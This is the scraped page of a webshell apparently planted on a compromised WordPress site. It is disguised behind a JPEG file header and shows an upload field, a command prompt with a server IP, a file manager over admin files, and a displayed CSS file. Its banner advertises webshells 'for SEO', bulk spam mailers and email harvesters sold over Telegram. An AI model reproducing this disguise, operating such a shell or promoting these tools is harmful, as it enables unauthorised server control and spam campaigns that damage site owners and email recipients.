����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

eliteafr@216.73.217.106: ~ $
.wrap [class*="CodeMirror-lint-marker"],
.wp-core-ui [class*="CodeMirror-lint-message"],
.wrap .CodeMirror-lint-marker-multiple {
	background-image: none;
}

.wp-core-ui .CodeMirror-lint-marker-error,
.wp-core-ui .CodeMirror-lint-marker-warning {
	cursor: help;
}

.wrap .CodeMirror-lint-marker-multiple {
	position: absolute;
	top: 0;
}

.wrap [class*="CodeMirror-lint-marker"]:before {
	font: normal 18px/1 dashicons;
	position: relative;
	top: -2px;
}

.wp-core-ui [class*="CodeMirror-lint-message"]:before {
	font: normal 16px/1 dashicons;
	left: 16px;
	position: absolute;
}

.wp-core-ui .CodeMirror-lint-message-error,
.wp-core-ui .CodeMirror-lint-message-warning {
	box-shadow: 0 1px 1px 0 rgba(0, 0, 0, 0.1);
	margin: 5px 0 2px;
	padding: 3px 12px 3px 28px;
}

.wp-core-ui .CodeMirror-lint-message-warning {
	background-color: #fcf9e8;
	border-left: 4px solid #dba617;
}

.wrap .CodeMirror-lint-marker-warning:before,
.wp-core-ui .CodeMirror-lint-message-warning:before {
	content: "\f534";
	color: #dba617;
}

.wp-core-ui .CodeMirror-lint-message-error {
	background-color: #fcf0f1;
	border-left: 4px solid #d63638;
}

.wrap .CodeMirror-lint-marker-error:before,
.wp-core-ui .CodeMirror-lint-message-error:before {
	content: "\f153";
	color: #d63638;
}

.wp-core-ui .CodeMirror-lint-tooltip {
	background: none;
	border: none;
	border-radius: 0;
	direction: ltr;
}

.wrap .CodeMirror .CodeMirror-matchingbracket {
	background: rgba(219, 166, 23, 0.3);
	color: inherit;
}

.CodeMirror {
	text-align: left;
}

.wrap .CodeMirror .CodeMirror-linenumber {
	color: #646970;
}

Filemanager

Name Type Size Permission Actions
addon-installation Folder 0755
PROGRAMME2017-20260716054959.pdf File 153.34 KB 0644
PROGRAMME2017.pdf File 153.34 KB 0644
about-20260716115040.css File 25.95 KB 0644
about.css File 25.95 KB 0644
check-required-version.php File 4.88 KB 0644
classes-surface-20260717015551.php File 814 B 0644
classes-surface.php File 814 B 0644
code-editor-20260716112746.css File 1.54 KB 0644
code-editor-20260716140347.css File 1.54 KB 0644
code-editor-rtl.min.css File 1.41 KB 0644
code-editor.css File 1.54 KB 0644
code-editor.min-20260717041123.css File 1.4 KB 0644
code-editor.min.css File 1.4 KB 0644
common.min-20260716104039.css File 57.53 KB 0644
common.min.css File 57.53 KB 0644
customize-widgets.min.css File 9.38 KB 0644
dashboard.css File 29.1 KB 0644
edit-20260716065331.css File 37.03 KB 0644
edit-20260716094423.css File 37.03 KB 0644
edit-rtl-20260717064715.css File 37.07 KB 0644
edit-rtl.css File 37.07 KB 0644
edit.css File 37.03 KB 0644
edit.min-20260716195919.css File 29.17 KB 0644
edit.min.css File 29.17 KB 0644
editor-responsive.strings-20260520203706-20260520204053-20260520213840-20260520213926-20260520214012-20260520214108-20260520214202-20260520214251.js File 29 B 0644
editor-responsive.strings-20260520203706-20260520204053-20260520213840-20260520213926-20260520214012-20260520214108-20260520214202-20260522152815-20260528041747.js File 29 B 0644
editor-responsive.strings-20260520203706-20260520204053-20260520213840-20260520213926-20260520214012-20260520214108-20260520214202-20260522152815.js File 29 B 0644
editor-responsive.strings-20260520203706-20260520204053-20260520213840-20260520213926-20260520214012-20260520214108-20260520214202-20260522180010-20260523040552.js File 29 B 0644
editor-responsive.strings-20260520203706-20260520204053-20260520213840-20260520213926-20260520214012-20260520214108-20260520214202-20260522180010-20260526135942.js File 29 B 0644
editor-responsive.strings-20260520203706-20260520204053-20260520213840-20260520213926-20260520214012-20260520214108-20260520214202-20260522180010.js File 29 B 0644
editor-responsive.strings-20260520203706-20260520204053-20260520213840-20260520213926-20260520214012-20260520214108-20260520214202-20260614024125.js File 29 B 0644
editor-responsive.strings-20260520203706-20260520204053-20260520213840-20260520213926-20260520214012-20260520214108-20260520214202-20260615080935.js File 29 B 0644
editor-responsive.strings-20260520203706-20260520204053-20260520213840-20260520213926-20260520214012-20260520214108-20260520214202-20260618164721.js File 29 B 0644
editor-responsive.strings-20260520203706-20260520204053-20260520213840-20260520213926-20260520214012-20260520214108-20260520214202.js File 29 B 0644
farbtastic-20260716044640.css File 611 B 0644
farbtastic.css File 611 B 0644
forms-20260717002949.css File 36.04 KB 0644
forms.css File 36.04 KB 0644
forms.min-20260717093825.css File 27.78 KB 0644
forms.min.css File 27.78 KB 0644
install.min-20260716100619.css File 4.95 KB 0644
install.min.css File 4.95 KB 0644
integrations-page-20260716084543.php File 9.8 KB 0644
integrations-page.php File 9.8 KB 0644
loadable-interface-20260716195314.php File 286 B 0644
loadable-interface.php File 286 B 0644
plugin-install-20260716104012.php File 38.55 KB 0644
plugin-install.php File 38.55 KB 0644
settings-integration-20260717093738.php File 35.5 KB 0644
settings-integration.php File 35.5 KB 0644
theme-install-20260716141611.php File 6.83 KB 0644
theme-install.php File 6.83 KB 0644
themes.min-20260716014033.css File 31.92 KB 0644
themes.min.css File 31.92 KB 0644
widgets-rtl.min-20260716101129.css File 14.09 KB 0644
widgets-rtl.min.css File 14.09 KB 0644
widgets.css File 17.22 KB 0644
widgets.min-20260716111314.css File 14.08 KB 0644
widgets.min.css File 14.08 KB 0644
wp-admin-20260716152126.css File 395 B 0644
wp-admin.css File 395 B 0644
wrapper-20260717001252.php File 1.44 KB 0644
wrapper-20260717012708.php File 1.44 KB 0644
wrapper.php File 1.44 KB 0644